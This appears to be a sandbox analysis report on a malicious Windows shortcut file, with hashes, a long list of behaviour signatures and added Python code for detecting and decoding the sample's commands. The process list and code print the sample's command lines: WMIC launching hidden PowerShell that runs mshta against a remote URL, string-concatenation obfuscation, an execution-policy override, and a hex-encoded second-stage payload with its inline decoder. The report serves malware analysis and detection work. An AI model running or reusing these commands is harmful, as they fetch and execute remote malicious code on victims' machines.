Analysis Report
nTyPEbq9wQ.lnk
Overview
General Information
Sample name: | nTyPEbq9wQ.lnk (renamed because the original name is a hash value) |
Original sample name: | 3f07684c8928f37a94395ac341b222b4.lnk |
Analysis ID: | 1579759 |
MD5: | 3f07684c8928f37a94395ac341b222b4 |
SHA1: | c55ac3e96ec0c1e9310059ef9862f1f142b37091 |
SHA256: | 76a557c2ff0701d6c2631ac16582c07df84695b64d1fdd1901c1b14479a9f991 |
Tags: | lnk, user-abuse_ch |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
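The Sigma hits above (Wmic.EXE process creation, execution-policy change, Invoke-WebRequest/MSHTA abuse) are easier to reason about against the actual command lines. The following is an added example, not the sandbox's own detection logic: a small rule set in the spirit of those signatures, run over process-creation events rebuilt from the command lines in this report's process list further down the page. The event layout (pid / image / cmdline) is our assumption, no parent-process data is used because the page does not give the tree structure, and `-w 1` is read as `-WindowStyle Hidden`. The point it makes is that a literal search for `mshta.exe` misses the `'ms' + 'hta' + '.exe '` concatenation used by PID 2452 and 6592 unless the concatenation is folded first.

```python
"""Added example: a small rule set, in the spirit of the Sigma hits listed
above, run over process-creation events rebuilt from the command lines in
this report's process list. This is not the sandbox's own detection code.
The event layout (pid / image / cmdline) is an assumption; no parent-process
data is used because the page does not give the tree structure."""
import re

URL = "https://tiffany-careers.com/HA_19-12NGHEP_anh"
PS = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'

# Constructed from the report: PIDs, images and command lines are the page's
# (the PID 1820 line is cut short here, as it is on the page).
EVENTS = [
    {"pid": 2452, "image": "wmic.exe",
     "cmdline": '"C:\\Windows\\System32\\Wbem\\wmic.exe" process call create '
                f"\"powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + '{URL}')\""},
    {"pid": 1704, "image": "conhost.exe",
     "cmdline": "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6592, "image": "powershell.exe",
     "cmdline": f"powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + '{URL}')"},
    {"pid": 5860, "image": "powershell.exe",
     "cmdline": f'{PS} -Command "mshta.exe {URL}"'},
    {"pid": 2764, "image": "mshta.exe",
     "cmdline": f'"C:\\Windows\\system32\\mshta.exe" {URL}'},
    {"pid": 1820, "image": "powershell.exe",
     "cmdline": f"{PS} -w 1 -ep Unrestricted -nop function clean ($YUBmqnRj)"
                "{return -split ($YUBmqnRj -replace '..', '0x$& ')};"
                "$JQJjsu = clean('5B4D0AAC74AF94B96DE6D0711E9796AF"},
]

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def deobfuscate_concat(cmdline: str) -> str:
    """Fold PowerShell string concatenation ('ms' + 'hta' -> 'mshta') until stable."""
    prev = None
    while prev != cmdline:
        prev = cmdline
        cmdline = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmdline)
    return cmdline

# (rule name, images it applies to or None for any image, pattern)
RULES = [
    ("wmic_process_call_create", {"wmic.exe"},
     re.compile(r"\bprocess\s+call\s+create\b", re.I)),
    ("powershell_hidden_window", None,  # -w 1 is -WindowStyle Hidden
     re.compile(r"powershell.*?\s-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I | re.S)),
    ("powershell_exec_policy_override", None,
     re.compile(r"\s-e(?:p|xecutionpolicy)\s+(?:unrestricted|bypass)\b", re.I)),
    ("string_concat_obfuscation", None, CONCAT),
    ("mshta_invoked_by_other_process", {"powershell.exe", "wmic.exe", "cmd.exe"},
     re.compile(r"\bmshta(?:\.exe)?\b", re.I)),
    ("mshta_remote_url", {"mshta.exe"}, re.compile(r"https?://", re.I)),
    ("inline_hex_decoder", None, re.compile(r"-replace\s+'\.\.'", re.I)),
]

def evaluate(event: dict) -> list:
    """Names of the rules that fire on the raw or on the concat-folded cmdline."""
    raw = event["cmdline"]
    folded = deobfuscate_concat(raw)
    image = event["image"].lower()
    return [name for name, images, pat in RULES
            if (images is None or image in images)
            and (pat.search(raw) or pat.search(folded))]

def triage(events: list) -> dict:
    """Map pid -> fired rules, so the chain can be read off in creation order."""
    return {e["pid"]: evaluate(e) for e in events}

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits or "-")
```

Without `deobfuscate_concat`, PID 6592 would only trip the hidden-window and concatenation rules; after folding, its command line reads `mshta.exe https://tiffany-careers.com/...` and the LOLBin rule fires as it does for PID 5860.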
Classification
- System is w10x64
- WMIC.exe (PID: 2452 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/HA_19-12NGHEP_anh')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6592 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/HA_19-12NGHEP_anh') MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/HA_19-12NGHEP_anh" MD5: 04029E121A0CFA5991749937DD22A1D9)
- mshta.exe (PID: 2764 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/HA_19-12NGHEP_anh MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 1820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($YUBmqnRj){return -split ($YUBmqnRj -replace '..', '0x$& ')};$JQJjsu = clean('5B4D0AAC74AF94B96DE6D0711E9796AF44D95584C20A8120E5F4C2D55E092A7A2D251DA390909853B5C79690E93A85CB92B9FDEFC65F3CDB1D06CC6879B4516928A8BF4DBB11970D2A2BD075032D2FCA7E0D722AAA3530CE3EB19E65FE575E8A25BED1C1BF5DFFD683FB4BC2EAA8FE8F1A60500155478D87FAC118323C432F5036D59616B9773D97224FA5D5F611314ADE0D4C1D3748EB30F2D127D9E5D8ABFD58BF6DFAB496B4151926B4932EB4E2002C026F0DAD699E3BF4E2AFBA35AC0D2467BE27D487758C9F0E13B99AB91507093DA9B8C8F3FC004623B2AC22915FF6DDA0F2A151FD5C5BC18FFC2D1AD49092E43840545B43C3931B9431F537A4EAF81384FCE89E341CB162F0D74C7C8BBE83A369F44C7C8AD2314CDE87C92213F354F43436DD67669190C7CF80EAB568C8FFE5DF1D7A7289E9AFCC57749726D4170CB358F474A9B394F92F7A7C59B69E1D4F3048A9AF1B1BF6458C6DC0905071FC67BF46B82AB406FD2E0DD0353A56DB42CC22A38391221F97AF42C621E21E76AAD151B423B4198F39A2C8B1B8521C9400861EA34B51E60B32DCF611B5BA64111CB29E6119A047B3C01F8189C05F98FACD727C23B17202459A7730C79C74BF89421B7760627C3EF646B0FA2677D229451827319989785D6B8F597DD83E86CE034F586EC33BFB81CEA7484471E4468F516FD291FF97F14BF7E804A851C2C5526F5C84BE28FADD849079EF0089CEB62A808A2394FFC96A219396786CD01610BE36929BF865E35CD69E6A8E9B2594734C53B954CE005A47ED538E28D7BCE8E8B096462399F500F3B6D157E20DB80631F70368AA3E87F3E6B4A33350E734FE88F2D62FD30B450A5F8061AD2D42D59E00EB1797E197155F3CC5A81E5A28E6FE0A7847C64D970D00EB3212F922E5A69EDCCA6A771B579DA91E8062F135579A2F596F4FB904E51632EC3798751469A06B55F431B3C278D02BA162BAD2051DD8ECEF925C3B148ACC6CF884D595F47ECED7EE54A234964C7AC1C53386EE8ADD5543AAB0A0A455D9BC24791A136E50CBE3C2494A9E1C02E194A3C9AECB489457F71355B11D616C94AD17918390627C6F8D0EBFEC0D4B85391A1F467AEB4171DF3219BB517EB07410A106FF89CCA8023C0CF6C0F5251A8E428413363D25F0B505E17AEC003693E130A590DB8BBE133FFB0BDBC8930DA536699D6DAAC01BB7FD671DBE8DEFF6B4028FE57FCB454DAD571F21C46E58BED7CC67F8F8B3F124E43476CD67F681F52F9E21044F8C5361A690A893FA06D69E2DB01A27F3503C04BE81BB4A323F8EECBA5358DDB14C9EC0469AEE1544FB484B6D1A6724132B29F8451BF425B1B9762AA86E3A6ED9A28760C77FEC629AE93E74262197D8D6B10F23ED27497ECC808D24E7D6E88CEB1D5788785816C5FA9EAB87109E431C7C6442BA4FC96DA32D0841A2C60881B66136D63452D540BE93E778EDEC6BA91D01916A1EEC4EB6A74F22241194EC1EEDC14528EAC307306F8E6CAAAC68402C965A0CE3A683F3BF2B61F6BEBD7EC1347EECF6D52329C0F2D6EE0FDC59AD85C3A7B382EE197C38A04DDE6FEF2EBDF6F21091DD434E3ED41F090
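The PID 1820 command line above carries its second stage as a hex string and decodes it inline: in PowerShell, `-replace '..', '0x$& '` is a .NET regex replace in which `$&` stands for the whole match, so every pair of hex digits becomes `0xNN ` and the unary `-split` then breaks the result on whitespace into an array of `0xNN` strings. The following is an added example, not code from the report or from the sample's author: a Python re-implementation of that `clean` helper so the step can be reproduced offline on the blob's prefix. What the script does with the array is cut off on this page; the cast to bytes and the MZ check below are our own assumptions about the next step, not something the page states.

```python
"""Added example (not from the report or the sample's author): a Python
re-implementation of the `clean` helper in the PID 1820 command line, so the
hex-to-token step can be reproduced offline. Casting the tokens to bytes and
checking for an MZ header are assumptions about what follows; the page does
not show the rest of the script."""
import re

# First 50 hex digits of the blob passed to clean() on this page (25 bytes).
BLOB_PREFIX = "5B4D0AAC74AF94B96DE6D0711E9796AF44D95584C20A8120E5"

def clean(hexstr: str) -> list:
    """Mirror of: return -split ($hexstr -replace '..', '0x$& ')
    Each two-character match becomes '0xNN ' (the .NET $& is the whole match),
    then the string is split on whitespace."""
    tagged = re.sub(r"..", lambda m: "0x" + m.group(0) + " ", hexstr)
    # str.split() drops the trailing empty token produced by the final space;
    # the PowerShell side relies on the unary -split behaving the same way,
    # since a stray "" would not convert to a byte.
    return tagged.split()

def to_bytes(tokens: list) -> bytes:
    """Assumed next step ([byte[]] cast). An odd-length input leaves a single
    trailing hex digit that is not a byte literal, so reject it explicitly."""
    if any(not re.fullmatch(r"0x[0-9A-Fa-f]{2}", t) for t in tokens):
        raise ValueError("odd-length or non-hex input: a token is not a 0xNN byte literal")
    return bytes(int(t, 16) for t in tokens)

def decode(hexstr: str) -> bytes:
    return to_bytes(clean(hexstr))

def looks_like_pe(data: bytes) -> bool:
    """A raw PE image starts with the 'MZ' DOS header."""
    return data[:2] == b"MZ"

if __name__ == "__main__":
    data = decode(BLOB_PREFIX)
    print(len(data), "bytes; first four:", data[:4].hex(),
          "; MZ header:", looks_like_pe(data))
```

The visible prefix decodes to `5B 4D 0A AC ...`, not `4D 5A`, so the tokens are not a plain PE image as they stand; whatever transform the truncated remainder of the script applies is not recoverable from this page, and the report's "Powershell drops PE file" signature only tells us that a PE was written eventually.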